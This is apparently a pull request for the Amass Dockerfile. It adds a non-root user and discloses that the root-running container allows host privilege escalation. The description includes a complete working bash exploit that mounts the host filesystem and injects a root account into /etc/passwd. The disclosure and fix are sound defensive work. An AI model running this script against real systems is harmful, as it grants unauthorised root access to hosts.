### PR TITLE
Modify Dockerfile to prevent privilege escalation

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -8,4 +8,9 @@ FROM alpine:latest
 RUN apk --no-cache add ca-certificates
 COPY --from=build /go/bin/amass /bin/amass
 ENV HOME /
+RUN addgroup user \
+    && adduser user -D -G user \
+    && mkdir /.config \
+    && chown -R user:user /.config
+USER user
 ENTRYPOINT ["/bin/amass"]


### PR DESCRIPTION
The Dockerfile in this version (which has been introduced in July 6th 2018, and possibly affecting all releases since at least 3.0.18) makes the host system vulnerable to root privilege escalation. I was able to reproduce this exploit with 100% success in multiple instances in a `Linux 5.8.0-59-generic #66~20.04.1-Ubuntu` system.

The simple fact that a caffix/amass:latest docker image is present on the system is enough to leave it open to exploitation. That can be done by executing the following shell script with a low-privileged user that has permission to execute Docker:

```
#!/bin/bash

# Simple check to verify if the current user has permission to execute Docker
docker_ps=$( docker ps | grep "CONTAINER ID" | cut -d " " -f 1-2 ) 

if [ "$docker_ps" == "CONTAINER ID" ]; then
    rootname=amass-privesc
    passwd=amass
    hpass=$(openssl passwd -1 -salt mysalt $passwd)

    # Run a detached container that is left "hanging" with the /bin/sh binary
    docker run --name amass-privesc --entrypoint /bin/sh -v /:/mnt/ -itd caffix/amass:latest
    
    # Use the running container as a bypass to inject a line on the host's /etc/passwd file
    docker exec -it amass-privesc sh -c "echo -e '$rootname:$hpass:0:0:root:/root:/bin/bash' >> /mnt/etc/passwd"    
    
    echo 'Privilege escalation completed. Root user "amass-privesc" created on the host. \
    Enter the password "amass" to login as root:'

    docker rm -f amass-privesc
    su $rootname

else echo "Your account does not have permission to execute docker or docker is not running. Aborting..."
    exit

fi
```

I found this issue while attempting to integrate Amass as a Docker container in a project I'm working on. I needed a JSON output to be written to a volume and noticed that it was successfully written, but by the root user. This led me to the conclusion that the container itself must have been running as root, which was the case.

The modification I propose seems to be enough to mitigate the issue, but I have tested it with few commands and there were no problems. More extensive testing is advised, though, if this is to become a production patch.